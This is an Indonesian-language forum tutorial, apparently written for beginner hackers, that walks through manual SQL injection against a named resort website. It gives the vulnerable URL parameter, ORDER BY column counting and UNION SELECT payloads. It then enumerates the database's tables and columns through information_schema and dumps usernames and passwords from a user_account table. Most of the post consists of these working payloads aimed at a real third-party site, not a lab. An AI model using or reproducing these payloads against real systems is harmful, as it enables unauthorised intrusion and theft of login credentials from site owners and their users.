okeh di mulai aja dah
ini tutor dari om cangcimen..
ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane)
, untuk para dewa (dewa19 kaleee 
) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn)
RULE:
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar
) kalo bertanya bebas 2. Harus jelas dalam bertanya dan memberikan tutorial
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol
kalo beitu langsung aja deh, sekarang ane duluan
target : www.canseburesort.co.id
dari alamt website ini terdapat celah Sqli,
www.canseburesort.co.id/?id_page=6&id_berita=15
seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote '
www.canseburesort.co.id/?id_page=6&id_berita=15'
yoman ternyata ini benar ada pesan error itu..
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by
id_berita=-15 order by 1--
id_berita=-15 order by 2--
id_berita=-15 order by 3--
id_berita=-15 order by 4--
|
|sampai
|
id_berita=-15 order by 9--
berikut gambar ketika menggunakan
id_berita=-15 order by 1--
dan ini ketika kita menggunakan
id_berita=-15 order by 9--
okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n) berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di keluarin (sok tau banget
)lanjut...
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number
id_berita=-15 union all select 1,2,3,4,5,6,7,8--
angka-angka itu tergantung jumlah kolom ya
the magic numbers = 3,4,5
dari angka itu kita bakalan dapet informasi sepert:
versi : version()
user : user()
database : database()
nama tabel : table_name
nama kolom : column_name
dll
okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya
id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--
ane pake magic number 5
lanjut lagi kita pengen tau ada tabel apa aja ya
id_berita=-15 union all select
1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables
where table_schema=database()--
ane pake magic number 5
kita dapetin tuh nama tablenya:
additional_menu,ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa
adm_page,
ads_banner,
amazing_camp,
artikel,
banner,
client_category,
client_image,
galery,
galery_category,
lib_news,
lib_page,
lib_promo,
menu_child,
nav_menu,
news,
price_room,
promotion,
room_galery,
user_account
)sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :
user_account = 0x757365725f6163636f756e74
maka jadi seperti ini
id_berita=-15 union all select
1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns
where table_name= 0x757365725f6163636f756e74--
ane pake magic number 5
dapet juga tuh, sekarang kita liat password sama usernamenya
id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--
ane pake magic number 5
akhirnya kita udah dapet itu username sma passwordnya
kalo beruntung kita bisa decrypt itu username sama password
tapi kalo ngga bisa ya pasrah 
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya...
semoga membantu para daun muda DC
(amin)di tunggu hasil kreasi kalian semuanya..
jangan lupa di cendolin yak...
----Terima Kasih DC----
0 komentar:
Post a Comment